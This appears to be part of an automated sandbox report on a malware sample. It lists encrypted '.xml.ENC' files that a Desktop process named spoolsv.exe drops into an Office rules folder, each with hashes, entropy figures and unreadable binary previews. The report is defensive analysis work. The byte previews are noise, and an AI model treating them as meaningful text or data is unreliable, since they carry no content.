                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t......H.ih.1..... < .....h..s+.....uY+..3...3:P.e..#.B...+.E..3.8.....[...$.HT.....\j..~.<~.=.}......?..T.....^.&no.B.=..y..9.....)/Af.Y.J....T...7H....T..>.K.5....O.~.$Zp.....c.Bk....].._<..:.@3....]%..]#f.XX#.F......1}....N.]..:+.%1....[s.....O......C.@f....<=..x.8..PLi....V.....+.`.W..!..Dp...Zq..>r+.?..#....P..SbA...D.u.C8.'.;..xkJ...a......6_p?..I8c....6X.Kj.-^7.@.q.#...$X.P.W..2....s.#..'[..n.N..%.S&lZ.,......0...TYmx>%.ie.G^r&&}6k....1h..C.q...#%.I..2.J.=}~ .?_^.m.}.'..ww4&..J.......}l.uP...M.`.....$...(X......3..'vB.....:~.yE.R.w.Ch..j(.J..||X...N.#fdS.r.:...d&.k......i.).9A..osO.eEY.)'.......D...X..).z.......':....<o..\0.}l....W.F@..Q.Y.._.2./.6...sE@.MF...L........'D.PgO.Dc...._@.P.i&.u..dZ...c9..|#-......f...g.;0P.1..Ud.ap...>...vC....UN.o...<5...h. .'.=.8E.`.1.1".e.=.Q....-...y.d..{.....k.A....5......?..../.;......].....e..QQ?.F....5...1s*...}..>.........G{.S..6..=Kk..im.......r^n{/#@Nh.u...E=:.(

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700851v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1424
                                                                                                                                                                                                                                                      Entropy (8bit):7.870837412116206
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/V62eXvED79iBHYRRSxGATpUNaVyt5sm+6cClBHEPDoTCCsGehHEj202:/Vlav+9+HYR8xGAiN/tum+6cMBmNGeP
                                                                                                                                                                                                                                                      MD5:D13008EA6F5AE049575298BF7FF979D2
                                                                                                                                                                                                                                                      SHA1:C9F82AC5B09B8A0C3EF4E17D53DC65A80D461818
                                                                                                                                                                                                                                                      SHA-256:48B93D293651588A9038D976B38BA18D0B9D5E4B373B330985256A4B52D6999A
                                                                                                                                                                                                                                                      SHA-512:F7739A6204126F3395EC8D1D6519D75CFFFA6763F985707CAC15E4853B71848EFB16F40507397113A72465A9EBB73D51896AC8551469BF9A7D9D31DFE4DF0AA7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.+e .pB....x.....S....x........t...5IS!..;.Y9.o_.......G.Q....h... ^.e,..).=.EG..<....WI.RU..h".T[_...p@.d..x=..W.....v.{}...w...).....B>.Bo.Ca4.n..5:.....e.)f.....Ng.....!.K.g....$..<.`.&.kk.C...!.(...}G....[.a^dc..V...0.>.=...<)... ..(..|.m3v..?..Y.{e..#b..r...P..Ge.....]....$...=..._a..s.*.S....C.2...;..9ZD.\.\..f*M.JR..(5..G.?..2.&.e1../.dR.8...O..p_../.....2r..'y.z.g....}4.........}......2{.Q}..]8..v..N..?....UE.......2.p.Z....|.....G........l...+..@..6.c..>2s:...wb...\V,.C..B<r...8.g>.....?;j'Q.x+UT.zA.].76....go....l...a..4..a....g.##@...T. $..;yR.}....}.eV..K.O....w..-I...._k\Oy...-D..q.U.P.n;i4...1.=....W".,.)Q..(,.(..>.T...9.J..l..u<.~....P.I...U........X.~;#`..]...!m.C.LyO.U.n.#..N.:.....%o.%..I..M.H......T..U3$.m.&.y.=.6.:...|.`..DRX.g..:...@s.5.......$..R..S.s.K....sA...F...o.RW....%.T.z...>U}.17..Vj..n=.3El.C...i.....Ym...y...0...Ww0.-.W8..~....(..[`$d&3.O....Q....l.4..O>G>r.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700900v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.864763458131654
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/xO4bvXr9XBJmYfPjJPRkPVnsKwqeLELvUmm+ir4GgLWfn8l4wgoJye1OKmhkKn:/xOcJR3tP+Pwds8m0MGbf8l4wXJ/1Ahd
                                                                                                                                                                                                                                                      MD5:66BFC29EEA128DBE734649918F911966
                                                                                                                                                                                                                                                      SHA1:A765606C122C24D9F9B4DDC418F33C9342AD582B
                                                                                                                                                                                                                                                      SHA-256:EB2D48392DCC2780F88C0F0DF70F51AAB58CA81C551D41609EF5E02BFFEA9388
                                                                                                                                                                                                                                                      SHA-512:CD097EA41F1B6C25601DEEBEF48EA4FBC7CF26B283477F0227D28D4C5D7B49E2A2A7054FB67015B1BFAE7435AEF6ECA118AD35E6E60B881E7492D29C013C9EB0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.....`H...Q.q..[...C. ]...#5$....LH...|...k;.<...G=...O.........sXJ..C..{.....2z...3..NM...f..A.;. #..%#.$.lC.....2.<s^ZW.e..J'.....H.D.v.._.....wd....fn..z.g9...g......=;../eD Q^.f... ..a...}J.E-...T..z.C.J_F........u..B..>.LbI....k....Q.y. T.yN...Q../.R.....El....X.? rD..F.wqY9..Sp........g*.h.S.)a...p. .I...N zs..#~Y..f.`..@cL.a..c/T.~.;.;..J....Tj.Va.\....M.'\w.,iS....2.....?.e.O. ..&..x.s...2.>.....!xqF..*...F/J..[...}.X.VV..&.7.._,N.f.:.k.."../E9.....EP..GQ@o.>YwGI...6..y............ ..........V..@...'..D|..!Z....\.....j[Oa%..u...cY?5.&7!.{*......[.</.........!.0 ./.Y1......+.{.[.+.,...e...l>...J..Uq.).^..s.x#....*@K....B.I).u.06.5x].d./..:M......_J.5...[q...f.=7./n..w.4.y..wz..r._.]....^.<.y..bl%x:.za...h].&L/...&.K......%.'.=.....C.!.*.?.6PdR..Jw...j.O.l.z..$......2.pb.....U....V..M..>.7]>..L..i.&ix&......'.........4.<}.~..(....MF..h...L>...b........m..i....M:.o.....aF.&....e..j.-.^.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700901v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1424
                                                                                                                                                                                                                                                      Entropy (8bit):7.876038315113451
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/fiJIZTbgEvt5HC/+mmWdpkULA3xpJKR0nj/z9/TUkKd/rw/0O/D:/fisTbg8fo+mdknQRwN/TUkKd/M/0O/D
                                                                                                                                                                                                                                                      MD5:C39E7CE66E531DBE929217C27169E4D7
                                                                                                                                                                                                                                                      SHA1:D1160AEDE4F48E955CC034B0D20252603F48E3BF
                                                                                                                                                                                                                                                      SHA-256:A5BE673118F74F75B70627735DB5DCEE926450E9CE4C326B8259CFB6BAD4F4BB
                                                                                                                                                                                                                                                      SHA-512:7B8931507A6DE257AD02F2F26A4D872BCEDD5A667C2D98D3707CA019C9E2F2FAE8412624B6A36E3367723FD10313BC5B29868B8FA670C00A6164D4F54477B523
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.o..\....4..*.%.gmq.t.oj.e.S......o.....,...."<..#...2>....g..a.....cG.z../.g........}A.=...1.F..Z...i]...K..#.'.ve.|K]..y7.4.w4....XX&J.Ov...qrxe....{...f.RR..Y.....n.0G.....o..(.{-'i......D.q).}.....`.rd..~..=zY.D.u.'i.x.v....m['.o..v.{....x...g........Y..u......rgW4....L/....L[s0.&..,n..u.=Q3Ln.......fv.a...v..}...>.31...Y...`..D>wR".A\W.E.bu.!.y...,..%7.........o..)...ax>X..s..Tl..[.W}..\b*.R.F.(..q...2.."..d.7.3..^.7).G.e`0 R...(..7.q.f..8...N.h1+..^..b...d$.)...+.M].mr.S..7..X.LL...;....t....T...4.A6...9.)\l....-.....Z.'L]..&.}...<9...zHlk...[..^S..@...;X..[.h...z#jn..j.L.0.[..-...4.....i..g.Y...0..x..I....R.......F...G......Y.N....T..,Q.u. .G....$$o....n@..0....3&:.5......9..;k......B....n...jR....n.A..U.u.#$b...i7..b>.o$;..".e...ka..A.D..t.i.......s.64...HT.....M...d8....(...`<............[bW..a+3......\...)..LWj...b.3..j.YVl........p..........E5.......ft...O.^./aP..3.e..8~dB.K&T.T..)

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700950v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.851587693002074
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/92NluOJvkUNsqPX8ro2SqoRJInt9aZshXMzz0L0A/3ep/B/pFmWVZ6Xa:/9rOJLNsDoRUt9aZsGzz0o0klHheq
                                                                                                                                                                                                                                                      MD5:6C8B7519039F47AF95AF0C40801B68C4
                                                                                                                                                                                                                                                      SHA1:D2FDC33435461EC7A75DEFE8241D2824AF71DF99
                                                                                                                                                                                                                                                      SHA-256:02BB83BCBB8ADBC54F95B233814DD49DC8042878CAB3A8AE43B44B9AAD5E65A4
                                                                                                                                                                                                                                                      SHA-512:74E4904DB186D8521107A4E2B961646D1161FF9FEB02553C291B07645974DC32D13C45513D74A5328B48669E69EFF03BD190116D7781298AFA38A25F00FBC583
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..9....%~s.G...9sf....i3..._.?.9lq4...+8@...~...|..1...he.J..X..=.J....Jm....v...sE.[.."...9<.....`...<.S...=@0..4..j`x....m..:.U04.l.r.<..;G;.5........a......[Q"...N S...|ry.....+i....c1.'.i.S.%b&.P...g....6|..._>...R&.S..j1w.....o).cM/z6.oXH,.*.P.<.....B....8..DG..?yV@4.......R{,...-0.a.x`......x.o..N.......8...Z...3.c...a.-....jd_cZq..!........."....X/..dO..k......y.[9...=...n^DL..Z....P.h...a.E.gfJ.T*...i.{......Wj.^.....\...B...aF4N....&.h.../...$...L....c...IU4.%6r.4....R...X.......B...~.cMS2'/_8%..+<....2.T\4#...Q.:........HE..pl(.? .._O..D.e..<&....~...Rf.q.&.xg.I../..1e.z$.R. `...9...x!...W.e.L^..|..!!....k..Mls$.a.........O.$eg2V.w..>....vF.!..K\1 d...eaVZ.b....U.^......2...5>.....;&L...wb.R....}...OdC.....1.f?.v&..-...W.5p4..Yy[h.....F6s.G...e.>.@......"...V..z.X...~...yn..u ..R...1...1.g...&F./..\q.EB..w.Y.\...P...~.....P...B.q..R.{d..c.<WQ..%.f7.l.....q...'...e...A>B...<..;nX..i.*

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700951v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.875584423894276
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/pwUuYhup8j4dHBgIjQkX72W9JxI4bsuyv0xarenQzEyTuFd5Fcdu8xHjA:/pWYhu8cdhDjQQVDnnMCIfHc
                                                                                                                                                                                                                                                      MD5:6390E70CA4DB2D6CFEB60FF606B3FB65
                                                                                                                                                                                                                                                      SHA1:EB0C632326146317A3346B94260EF681A0463499
                                                                                                                                                                                                                                                      SHA-256:DE9ED5AB6A82B11FDB457AE177289949BE3FCF220C611A4D415EFF494F3563DD
                                                                                                                                                                                                                                                      SHA-512:D5AB96CB764CB752BDF8AEF0C75BF2686B84B799347764D855503056A369B5AD13675CF5EF1C49627997CF56DE2CA072C8F8D837BAD0ED1A7E0B61FD0934F44B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.-.#......$9. 3..r.I:.sA...g.......U.&..........F..=@i...Q.'.....#..)XU\Ls...ZT....:.....n].=..=|X,.R.|....KO(.....a...Ck....9.....P..)..c...1a./o.B"r.c.B..Sq..D3E..Dn.N.A..$<......2K...5.XA.No.........U2.-...%.......wy..&.(....j.b."t...\Z..@....S".@..$a..R..{.m..4.eG..JY..+...e.#..f...v<.*.[....z...l..8.1L.....7.'.O...$.]...,...+..b.3.65...6W.kO.../,...^".X...z.r..U.....G.2.O..E5...gOF......(...R.....~Y..f.W.I.X.M.(.o[q. ......p,...[......I....N..wa...F......r...=,~,5...C.!.....>K......a..I.4........"....9_...}..e].T,.2....g.:uH.6.~.c.vHpML*.[.....o.#;NM..:.ijbW.N...xTo"hC.:Bv..o.........>.M|_G.{....q..y.[....~..$d..T..a.sK..'.....x............D....H.F..7.._.....P.R..A.#...5.9.............]...F....Q6Mk.I..Yn..~G5.s.^Y[3..4tn...n..I.vs.....V...C(~]_.L.m...2...Kv.'D3J..6..8O...k...5.i...`.!.?*6.<Q.cu.c.$......+.j.2..L.>....M.V..........B..........Ws.R..wjTLDq..I...U..q.f..Jc.{F..Hq.......hA.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701050v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.874548530142769
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/uU0A0bCySXW57mXkTNKXmXajB/wHTO3evij1Xd1emZA:/uHbALAa16Tcs8A
                                                                                                                                                                                                                                                      MD5:9738B5ECE20B07638E41A4046C5153D8
                                                                                                                                                                                                                                                      SHA1:C5BD5FFC4D1953EB49BFCC889AF1AA49BFA8A440
                                                                                                                                                                                                                                                      SHA-256:C3F58769506D6E545D5F42E16BDB2EBD103818E2D20027A78ED6AF0612D56572
                                                                                                                                                                                                                                                      SHA-512:CBFE202D0622A9A14BD2F25226E462C1F4F4151995F142D85F0B885CF9065D49F0C1CEF2D5B755FE4507EE5B9224B0740962101FCC049FE0B48D49D9B3EA1C33
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.../.....QEq.k_d....... .i...HO"|..`$...p...N`..94eU.k.......}..<...;8.......i..su..V{%....N..Ps....r...(^....q.A..../.......v ;.-..H..bM.)..o......,i....9/.?...g.xfy..y.V..A.5.....&Y...h%j..O;_.}n..D.e(...gdY....0.M..RM..!.n,..'u.G/D[.R.c.u.X).`...)....H.Z......w.H:.S..TM....DZ...,Sg.<p.WCST_...,..LG.*.A.[..n.>...Hm.7. .P..<H..=.N.Pc....$..-....R)/h&.BR.@.fL...0.fW.)+..\....f^._........8.Ky..n..$. y&.m@...i!...Iv0e..K..3.....l..x.6....5.]pX@.o;..oLe.].R.4;PcV.(C...........l...v.~`.....dz.7....^.0.l.P.....9.. .C..7.\SW.;BJ...y...#.q.@V:..v.A.+.'..,6Y.L........g#m.._..?s......r.t....l.^...U.*.=....P.D.|.."..g=O<.....`i.}pb........b...\......TB...6&.cb..A...3..>NdE.".%.x..-.2.....%Ei.M........X.CK...+.......@..K...*. ..~.....x.b..D..I30....TY..wP.zXd.A^.oxT.%.Fh..."..$.e....,..5..K....e..)... .|....K'..9|c.......,.].O..........u.]M...-.V.b{q8G..E.|...8[.:.Z2D.....8F..F..........@..w.P.f+.%.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701051v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.858938776157932
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/c9sGrkXin0qJAMbP6Ssu9KFB13ImbmeUHwftCEr37HMgEAqaU5Jdgl:/c9xIZqKMOOCM4tP37sXjaUrI
                                                                                                                                                                                                                                                      MD5:F0AB52941BE4756D0C69ABE2F2A82755
                                                                                                                                                                                                                                                      SHA1:E8A837D99036E7711FC55228428E5E0A011BA0EC
                                                                                                                                                                                                                                                      SHA-256:1C50A78707F9DD4B76F43ABB5CD3A937281223E430B96AEEF5AB4E195D7DC62D
                                                                                                                                                                                                                                                      SHA-512:4EABD621492532C4B9317CC97B508AB224712F13A7E70C7BDA273E3A3CE9D4413E80F2365767D9ED7B99E7F2A0D551B2144B20F1FA4C49F47AE30F5827566806
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t......%J.>..fM...^e.....Viy.4...p..*...8.6..&".9.....M.......Iv......f.....r..P..!. tPN...NQ..?..OE....~..W`4..}.-.yb"......x..,.).:.k...... .?.7.MO.s{$.......a../K'T.E,)..........K..j..A.....CJ.%r./.D......R..eQ..Kl..{.m..K*......c. ..x....U..)...k.r. *....#...S#.....].....TU..X..n.%...Z<..%...[.......LH.._m7~..h....%.........;./...#.....g.<\l_8.L.......+L.2..Cls'.........%k.8.uv`..z.4`..Y...!..9~. 3....Z..=Ex_.........^.gZ.o.bm..u\.\/...G..,........f....-...>.m.l.b..>.{U...[...*dq4.X........n.`*.k.T..v...?./.....N.e..+....i.g0"^...zX.f...3....0k$:....N.]..'E....K4.e...]..s.. ....0q.d...'...gv$-08....e....{.I.Ln.....u.<S-.2.4j..m..'Y._c.U.,..K.....t...........q....j....Z.g..G.hQ..q.d.;....'9...N.....3...q....vO..3.[.u&..K;.5...'~.).....gol.<....}cc[$..i>..UjW.2.(k..4N..De.SQ.^.o....K..q.$.iF..........IA.D.zK..;......:.=....@.dE...!.*K.v.e..rh.d..s4...gE.Y..@.....r..Z..)E.-+..<.....f.JL.e.....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701100v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.866566851819725
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/mUVn57vkQX5gShYnHxJIbaHsZiuW/DVAMOJx2LtRC8TSemKaEGc2JJn:/n7kQpgnJI+HkPW/DVASy6bPaEan
                                                                                                                                                                                                                                                      MD5:5ADB4A9E3FF7870D7A51A8365F42E0BA
                                                                                                                                                                                                                                                      SHA1:B6702D451691D1DFF4931F6A64792AFCE9A87FDA
                                                                                                                                                                                                                                                      SHA-256:B727398DAF507EC8A354D4DE9465E5CD880D697F21577BD5DBCA5AB2753D25DC
                                                                                                                                                                                                                                                      SHA-512:A602B2084BFBEC1749D44ED52E9B455193A091DFBA72883AC02A9E6D008F781B1C275C4DE64F94D67A14F2407EBA175C0E756FF1C5BF15FBF3CD35CB81DB7B58
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.y..`<../.C;..Z.......}|".w.H....F0KO. .....M.}....$.9..'#}i..#~.E...1.4.1..92w...7./...0......(...b._....0..w..\k.%..+..5...g...d.3.6..c^.Pka.l)mY..h.........{....{.+..#.E<.....K.Q8%.ZX.{T.o..{.o.`.K..w..Dt..3.$wq...E.^......9.b.$.'`7.........t...$...{.5...1..10.%z....[.y..J."..0..Y....9F.....G...7...efg?(.[@p+.p.*/..7*.J..q....O....U.9.%....l@.G.....w%..x..W.;.......(.{...=...{......Q][......t.%......Z..D...E}.d...&p*Q.z4.$..T*e.x..}.pB..>..Z.....<rV.ICq.1..`+....gm.i..R..<....,..!1....8.S.U%.H*. !..u#....8....xl.O.!.,,Q;R.;.....'..U.%.3............PB.".:..|>.%-..1...o.L(j.M.u:.q.......[.....O..|*.,<..".PS......O o.).H#.+..,.C.hr..O&.O.5U].v.Y.lD.y.?>...#[^...Q+o#.x..........:....".@+...>...l....Mn.........."....Q_.g...[.E...T..v!h{...t....Qegu.Gp..@.x{.d..q..b.5#..$=J......V.NS ......55.M=52..X..~.sXc.[.*..1h.T.K..v....u.(.,..].{.V.d.D...%.S.+...V]..h-.........<.'!..!k..Ei..wi..|.....0#q.[....x....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701101v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1424
                                                                                                                                                                                                                                                      Entropy (8bit):7.867765425548071
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/80743FI44QY3iu81vFnqfpy5NWX3/Fb6stk8XaqyXFw+3x:/807uI0YeYpANWXPFXtkhvVw+3x
                                                                                                                                                                                                                                                      MD5:2876C4965F1F4606252AA17922D31630
                                                                                                                                                                                                                                                      SHA1:84659D10132C8701C814232F0250CE3D1E0012A0
                                                                                                                                                                                                                                                      SHA-256:CA3C3656264A7B7B0563ADDABFD98DA0F7E51272EF337FD767ABB38AA76BBDA5
                                                                                                                                                                                                                                                      SHA-512:7E10F171AA0DB611784C8218CCE4DDED369CC33524CB40C258D4CF109B3F27998946939401C62B3FE2E92E0DD5B4693A300F66723005CDEDB6F1BD757CE8F88F
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.N....e).z...._..U.%.{....W..g.&......F.v.a......x..D...9W...J...a...6.t..Q....g/>Nhx2`[..D.QC....^{V.\.b...H....dl.i..VA.(..>.."..u.1K..z+:....b.}./an\.S...W'?.e.s7[q.l;.+.<|e.&R.O./..>.M=_=.^v.BP...x[.GM......A.........E....81U...WI... ..A.'...$..$......&.XLf&>...\J..u..-..7..Gm[n.G.....ZK../\...H.6&dI.=..t.......*$........R.7..V..r..Fgf.m.....`..Q...L..:@.0C........;....sn....{..'......GU..Y....:}r^.pi.F..V...?I\... .M(j.....u....._...Ix@a.k|.q!..r.9C7.[..A7..~..c.....a.x...`.....my...Q..n...h.Y.....[..:;dQn.\..Ei...`O<|..2..B.F..SP.O.&#..I...{....M.8.>....L..,......2K...&..5l@(..L..}?p..@..C.g+.g.:n.f;.I.z......S..A@.{.P.m.J.UW.....6..mi..4.8`...U......._'.^O..\.851Q..J:.s.&....vMH.CfV...4./..<.....G....:.F...F+.AW..3v.-...s..K....8 8GT.f'.g..&_.......',...R...P.(...(...)..*.T...W.......M|.;....D.._n.>....G.&......`$.M'?..Vy.)0J.CX.X.{}.A...d...a9.T.[.*.PRi.;%......__.2...3c.......L-1s,

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701150v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.868714181771796
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/+M8B+KAmA3tIDmgk6MFADNZM+FViaEN8+oDp7M7E5VLD8Rwy2o+gSpD:/ljbmA3tF6MFwEI7FDpUOpwRwyZ+gwD
                                                                                                                                                                                                                                                      MD5:5D35B54C125A004C431B7E9E394936D0
                                                                                                                                                                                                                                                      SHA1:FFA92A1F4BDBFAC094F0575CA1EF39BC56262699
                                                                                                                                                                                                                                                      SHA-256:03FA289FBDED5927EA95EB7BD1A92BADEAEF681F129DBB436B8EAC88BA4E8A3E
                                                                                                                                                                                                                                                      SHA-512:A845CD33D45C8130536DA3FF6594AB987DF806B8471379ED044FE14E7567BEF5A311A5DFE2216D496C0C93B8B61EB7E5FB2C48360BC5BF91B2B04EDEF67FF956
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t...5.1s$c..@......D......Az.ON(.#...;....eG.+e!.......!........{....$.....,DK..EH......Q..8..VoG.u/.|..X..`..Y.p..).%.....v...g53...:(.(<D$..V.7...}.]@......Chme.d......4tZ...YL.....of........f..Q ..&..u.%As..v.f.\f...y....99.-..$..E...R...\....'..N........u.......#.d...I..*[.^.....5...#.T,..!` ......5..S.L....x<7.HZ..6D.?...Twp...<.VQ....Mq?.w.........lo..y]...||.A.+1..K..Q.X..'[../..X}............7........;.*0k......aRQ..%.~....6..:z..]h........=...lJ..A.~.2.:.[!....'.i.p. ..9...B..*"....y..@...3.....8......v.L..4#..%<.U`t.,iJ&..G.p.k.a.qe.W..Q(......|.e.."...^h.W..B./._....N..].m..`h.p...>.-.74..g...;r..`u....a...x...?T..)...a@..k...B(...~..4.Wl.$..pmg7..Mt!.......:~..Z.D/......F'!.#S;.^ ......v..L.d..B3f>.....`7h....LR..ZZ.L..K....`.lpq8....m.S&.2).O..b..2.7..r..G.. +`....< .l.g.lX..f...l~T. 8E=3F8.T...Z]..>....G.6.(|/1...Z+"H..............@.S.m.N.+mq..*..q........f.H.&.X.e...W0...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701151v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.85964327842037
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/d3ekQnUvRE3/xfNrzT+gUzJZflVP3J6MoupxmACqZ7/lxTbzOcnPET6fqoc9fiG:/d3ejnUvRE35V6vzP8/uaAplbdPrfqoU
                                                                                                                                                                                                                                                      MD5:8DD2DF60024D515E387E5DA8316F871E
                                                                                                                                                                                                                                                      SHA1:8DB2DEB76DA7CED242C99BA0577F4CEAF547E96C
                                                                                                                                                                                                                                                      SHA-256:B8640720F86E9C6392F427B1E95504913B4A06E664B6C8D6A8F06F8015845C85
                                                                                                                                                                                                                                                      SHA-512:CEE5685901BEDE04C9C00125074EBB399599EE7B9E3769A35F8F5D041CF2DA5CDEEC1FD4884EB44761F7FD0D678A70F8342F51D6768A080F8B970D5ACE15138E
                                                                                                                                                                                                                                                      Malicious:false
